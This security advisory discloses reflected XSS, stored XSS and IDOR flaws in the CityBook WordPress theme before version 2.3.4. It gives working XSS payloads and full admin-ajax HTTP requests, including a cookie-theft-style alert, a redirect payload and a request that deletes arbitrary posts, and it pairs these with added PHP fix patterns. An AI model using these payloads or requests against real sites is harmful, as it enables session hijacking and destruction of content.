CityBook < 2.3.4 - Multiple Vulnerabilities



Description
Multiple vulnerabilities were discovered in the «CityBook - Directory & Listing WordPress Theme» (tested version: v2.3.3):

- Unauthenticated Reflected XSS
- Authenticated Persistent XSS
- IDOR

Edit (WPScanTeam):
December 27th, 2019 - Envato Contacted
January 6th, 2020 - Envato Investigating
January 7th, 2020 - v2.3.4 released
Proof of Concept
----[]- Info: -[]----
Google Dork: /wp-content/themes/citybook/
Date: 27/12/2019
Demo website: https://citybook2.cththemes.com/
Demo account: m0ze2/asdasd (login/password)
PoC listing: https://citybook2.cththemes.com/dashboard/?dashboard=listings


----[]- Reflected XSS: -[]----
The input field with the placeholder «What are you looking for?» on the homepage is vulnerable: the search_term parameter is reflected into the page without escaping. Any payload prefixed with "> is executed three times, i.e. the reflected value is rendered at three points on the page. The regular search box (the block next to the website logo) behaves the same way.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
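
Root cause, illustrated. The theme's template code is not reproduced on this page, so the following is an added, hypothetical reconstruction of the pattern that produces this behaviour (a GET parameter written into three places without context-appropriate escaping), shown beside the escaped form using the WordPress escaping API. It is not the CityBook theme's code; the function names are mine. The shims at the top approximate esc_attr()/esc_html()/wp_unslash() so the file also runs with plain php outside WordPress.

```php
<?php
// Added example, not code from the CityBook theme. Reconstructs the pattern
// behind the reflected XSS above: a GET parameter written into HTML without
// context-appropriate escaping, beside the escaped form.

// Shims so this file runs with plain `php` outside WordPress. Inside
// WordPress the real functions are already defined and these are skipped.
if ( ! function_exists( 'esc_attr' ) ) {
    function esc_attr( $s ) { return htmlspecialchars( (string) $s, ENT_QUOTES, 'UTF-8' ); }
}
if ( ! function_exists( 'esc_html' ) ) {
    function esc_html( $s ) { return htmlspecialchars( (string) $s, ENT_QUOTES, 'UTF-8' ); }
}
if ( ! function_exists( 'wp_unslash' ) ) {
    function wp_unslash( $s ) { return stripslashes( (string) $s ); }
}

// Hypothetical vulnerable template: the raw `search_term` is reflected into
// three places (two attribute values and one text node), so a single payload
// starting with "> breaks out of the first attribute and fires three times.
function cb_vuln_search_form_html( array $get ) : string {
    $term = isset( $get['search_term'] ) ? $get['search_term'] : '';
    return '<input type="text" name="search_term" value="' . $term . '">' . "\n"
         . '<input type="hidden" name="search_term" value="' . $term . '">' . "\n"
         . '<h2>Results for: ' . $term . '</h2>';
}

// Hardened template: escape for the context each value lands in.
// esc_attr() for attribute values, esc_html() for text content. Both encode
// " and < so the payload is displayed literally instead of parsed as HTML.
function cb_safe_search_form_html( array $get ) : string {
    $term = isset( $get['search_term'] ) ? wp_unslash( $get['search_term'] ) : '';
    return '<input type="text" name="search_term" value="' . esc_attr( $term ) . '">' . "\n"
         . '<input type="hidden" name="search_term" value="' . esc_attr( $term ) . '">' . "\n"
         . '<h2>Results for: ' . esc_html( $term ) . '</h2>';
}

// Payload Sample #0 from the PoC above, URL-decoded.
$payload = '"><img src=x onerror=alert(document.cookie)>';
echo "--- vulnerable ---\n", cb_vuln_search_form_html( array( 'search_term' => $payload ) ), "\n";
echo "--- hardened ---\n",   cb_safe_search_form_html( array( 'search_term' => $payload ) ), "\n";
```

In the vulnerable output the "> closes the first attribute and an <img> element lands in the DOM at each of the three reflection points; in the hardened output every " and < is entity-encoded and the browser renders the payload as text.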


----[]- Persistent XSS -> Chat: -[]----
Any cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website. The message can be sent from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from the chat widget in the bottom right corner, and the payload executes when the recipient views the conversation.

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7C405cfe7009dfb008514e88229282ad33155a10e3d6d1c666e2cee90970212542; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577594557%7C8iIk54JQ5kAHa6T7JSiVvfOBTdqUbwjbQ4N5dlpeobY%7Cbc01a1bfc8e119a186128f522382374eae5a7d80a044290cfd77280880c51de0

action=citybook_addons_chat_reply&_nonce=a75ac6298d&cid=1230&user_id=785&touid=1&reply_text=%3Cimg%20src%3Dx%20onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E

Where:
user_id=XXX (your own user ID; in this example the account «m0ze» has ID 785);
touid=1 (recipient user ID; in this example ID 1 is the «admin» account);
reply_text=_payload_ (your URL-encoded payload).


----[]- Persistent Self-XSS -> Profile: -[]----
Vulnerable input fields: «Phone» and «Address». The payload is rendered only on https://citybook2.cththemes.com/dashboard/?dashboard=profile for the current user, hence self-XSS.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>


----[]- Persistent XSS -> Listing page: -[]----
Add a new listing at https://citybook2.cththemes.com/submit/ (on first use you must order the «Free» plan and then return to this URL).
Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description». In the «Trainers» section, the «Add Member» option has vulnerable «Name», «Job or Position» and «Description» fields. In the «Additional Services Fees» section, the «Add Service» option has a vulnerable «Service Name» field. The «Listing Address» payload is also rendered on the admin dashboard, so it can be used to steal administrator cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=7610
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C62973039250bcf64067f2d87460bc142bfc1a6623ea7c5a57cc973245fff0a97; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze2%7C1577601272%7CzdPIIYkbIF1EvBpygfJo6Sp9MO5rD5h2FRb0kSFOkb5%7C1790d7d33689fe6e21ffc2bcd001af3aa10e523b5a701b6f02944a4dd965f170; wp-settings-788=editor%3Dhtml; wp-settings-time-788=1577428516

-----------------------------18467633426500
Content-Disposition: form-data; name="lid"

7610
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"

4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"

false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"

PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"

<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>

-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"


-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"

50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"


-----------------------------18467633426500
Content-Disposition: form-data; name="locations"

US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"

64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"

84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"

66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"

76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"

m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"

"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"

<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"

<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"


-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"


-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"

moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"


-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"

--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"

<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"


-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"

<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"

<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"

<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"

82b818f99a
-----------------------------18467633426500--
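
Fix pattern for the stored XSS in the chat, profile and listing sections above: sanitize every field to its expected type at write time in the admin-ajax handler, and still escape at every render site (the advisory notes the address is rendered on the admin dashboard too). The following is an added example and not the CityBook theme's code: the field names are those from the submit_listing request above, while the function names, the meta key and the choice of stored format are assumptions. It relies on the WordPress sanitization API and therefore runs inside a loaded WordPress (for instance via wp eval-file), not as standalone PHP.

```php
<?php
// Added example, not code from the CityBook theme. A hypothetical sanitizer
// for the listing fields the advisory lists as vulnerable, to be applied in
// the `submit_listing` admin-ajax handler before anything is saved. Runs
// inside WordPress (e.g. `wp eval-file`); field names are those in the PoC
// request above, function names and stored-format choices are assumptions.

function cb_sanitize_listing_fields( array $post ) : array {
    $clean = array();

    // Plain-text fields: sanitize_text_field() strips tags, invalid UTF-8 and
    // stray whitespace, so the <img ...> of the payload is removed and only
    // inert text (here the leading quote and bracket) remains.
    foreach ( array( 'title', 'post_excerpt', 'contact_infos_address', 'contact_infos_phone', 'ltags_names' ) as $key ) {
        $clean[ $key ] = isset( $post[ $key ] ) ? sanitize_text_field( wp_unslash( $post[ $key ] ) ) : '';
    }

    // Coordinates are numbers, not free text: validate and normalise, and
    // drop anything that is not a number in range rather than storing it.
    foreach ( array( 'contact_infos_latitude' => 90.0, 'contact_infos_longitude' => 180.0 ) as $key => $limit ) {
        $raw = isset( $post[ $key ] ) ? trim( wp_unslash( $post[ $key ] ) ) : '';
        $clean[ $key ] = ( is_numeric( $raw ) && abs( (float) $raw ) <= $limit ) ? (string) (float) $raw : '';
    }

    // Email: sanitize, then keep it only if the result still validates.
    $email = isset( $post['contact_infos_email'] ) ? sanitize_email( wp_unslash( $post['contact_infos_email'] ) ) : '';
    $clean['contact_infos_email'] = is_email( $email ) ? $email : '';

    // URL: esc_url_raw() is the storage-side variant (esc_url() is for output).
    $clean['contact_infos_website'] = isset( $post['contact_infos_website'] )
        ? esc_url_raw( wp_unslash( $post['contact_infos_website'] ) ) : '';

    // Rich-text description: wp_kses_post() keeps the post-content tag set
    // but no event-handler attributes, so <img src=x onerror=...> is reduced
    // to <img src="x"> and <script> is removed entirely.
    $clean['content'] = isset( $post['content'] ) ? wp_kses_post( wp_unslash( $post['content'] ) ) : '';

    // Repeating groups (team members, service fees): sanitize every sub-field
    // of every row; sub-fields not in the allowlist are dropped.
    $groups = array(
        'lmember'   => array( 'name', 'job', 'desc' ),
        'lservices' => array( 'service_name', 'service_desc', 'service_price' ),
    );
    foreach ( $groups as $group => $fields ) {
        $clean[ $group ] = array();
        foreach ( (array) ( $post[ $group ] ?? array() ) as $row ) {
            $item = array();
            foreach ( $fields as $f ) {
                $item[ $f ] = isset( $row[ $f ] ) ? sanitize_text_field( wp_unslash( $row[ $f ] ) ) : '';
            }
            $clean[ $group ][] = $item;
        }
    }

    return $clean;
}

// Sanitizing on write does not replace escaping on read: the same stored
// value is rendered on the public listing page and, as the advisory notes
// for the address, on the admin dashboard. Every render site must escape.
function cb_render_listing_address( int $listing_id ) : string {
    $address = (string) get_post_meta( $listing_id, 'contact_infos_address', true ); // meta key assumed
    return '<span class="listing-address">' . esc_html( $address ) . '</span>';
}
```

The same split applies to the chat handler: reply_text should pass through sanitize_text_field() (or wp_kses_post() if formatting is wanted) before being stored, and through esc_html() when the conversation is rendered for the recipient, including in the admin's view.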


----[]- IDOR #0: -[]----
Any authenticated user can delete any post, page or listing by supplying its ID:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779
Pragma: no-cache
Cache-Control: no-cache

lid=1770&action=citybook_addons_delete_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee

Where:
lid=XXXX (the WordPress post ID of the target page/post/listing; it appears in the class attribute of that page's <body> tag, e.g. postid-XXXX or page-id-XXXX).


----[]- IDOR #1: -[]----
Any authenticated user can remove the «Featured» option from any listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: wordpress_sec_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C5958646454ea6fce0436f799b43314427bbf1336415aedc7eccfc1327da8c45f; tk_ai=woo%3AQQKdIMycj4rMbRJC%2BiDJmr%2FX; wordpress_logged_in_54d435e7d6922c566192cbf944196731=m0ze%7C1577577435%7CCetjW0nljmUkpvT20iPGzGootvMteHZr11imzXOb9e1%7C073f75d0412d7acbadd7fbc55d1524cf46e4625206c12b0832694ad3bb96689d; wp-settings-785=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-785=1577404779

lid=1739&lfeatured=true&action=citybook_addons_featured_listing&_nonce=ffb1991cee&_wpnonce=ffb1991cee

Where:
lid=XXXX (the WordPress post ID of the target page/post/listing; it appears in the class attribute of that page's <body> tag, e.g. postid-XXXX or page-id-XXXX).
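
Fix pattern for both IDORs: bind the capability check to the posted ID. A valid nonce only proves the request originated from the user's own dashboard page (a CSRF control); it says nothing about whether that user may act on lid. The following is an added example and not the CityBook theme's code: the parameter names (lid, lfeatured, _nonce) and the admin-ajax action names come from the PoCs above, while the nonce action string, the listing post type slug and the meta key are assumptions. It runs inside WordPress and would replace the theme's own callbacks for these two actions.

```php
<?php
// Added example, not code from the CityBook theme. Hypothetical hardened
// handlers for the two admin-ajax actions in the IDOR PoCs above, showing
// the check the originals lack: binding the capability test to the posted
// listing ID. Parameter names (lid, lfeatured, _nonce) and action names come
// from the PoCs; the nonce action, post type and meta key are assumptions.
// Runs inside WordPress, replacing the theme's own callbacks for these actions.

const CB_LISTING_POST_TYPE    = 'listing';         // assumed post type slug
const CB_LISTING_NONCE_ACTION = 'cb_listing_ajax'; // assumed; must match wp_create_nonce() on the dashboard

// Shared gate. Returns the validated listing ID or ends the request.
function cb_authorize_listing_action( string $meta_cap ) : int {
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'authentication required', 401 );
    }
    // The nonce proves the request came from the user's own dashboard page
    // (CSRF control). It says nothing about whether the user may touch $lid.
    check_ajax_referer( CB_LISTING_NONCE_ACTION, '_nonce' );

    $lid = isset( $_POST['lid'] ) ? absint( $_POST['lid'] ) : 0;
    if ( ! $lid || get_post_type( $lid ) !== CB_LISTING_POST_TYPE ) {
        // Refuses the "any post/page" case from IDOR #0 outright.
        wp_send_json_error( 'not a listing', 404 );
    }
    // Meta capabilities (delete_post, edit_post) are resolved per post via
    // map_meta_cap(): a regular user passes only for posts their role lets
    // them edit or delete, normally their own listings; an administrator
    // passes for all. This is the ownership check the original handlers lack.
    if ( ! current_user_can( $meta_cap, $lid ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    return $lid;
}

function cb_hardened_delete_listing() : void {
    $lid = cb_authorize_listing_action( 'delete_post' );
    if ( ! wp_trash_post( $lid ) ) {
        wp_send_json_error( 'trash failed', 500 );
    }
    wp_send_json_success( array( 'lid' => $lid ) );
}

function cb_hardened_featured_listing() : void {
    $lid      = cb_authorize_listing_action( 'edit_post' );
    $featured = isset( $_POST['lfeatured'] ) && 'true' === $_POST['lfeatured'];
    update_post_meta( $lid, '_cb_featured', $featured ? 1 : 0 ); // meta key assumed
    wp_send_json_success( array( 'lid' => $lid, 'featured' => $featured ) );
}

add_action( 'wp_ajax_citybook_addons_delete_listing',   'cb_hardened_delete_listing' );
add_action( 'wp_ajax_citybook_addons_featured_listing', 'cb_hardened_featured_listing' );
```

If the «Featured» flag is meant to be set by administrators only rather than by the listing owner, add a current_user_can( 'manage_options' ) check in the featured handler on top of the per-post edit_post check; ownership alone is the control the PoC shows to be missing.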

Affects Theme

fixed in version 2.3.4

References

CVE-2019-20210
CVE-2019-20211
CVE-2019-20212
CVE-2019-20209
URL https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727

Classification

Type MULTI

Miscellaneous

Original Researcher m0ze
Submitter m0ze
Submitter Twitter m0ze_ru
Verified Yes
WPVDB ID 10013

Timeline

Publicly Published 2020-01-09
Added 2020-01-09
Last Updated 2020-01-14
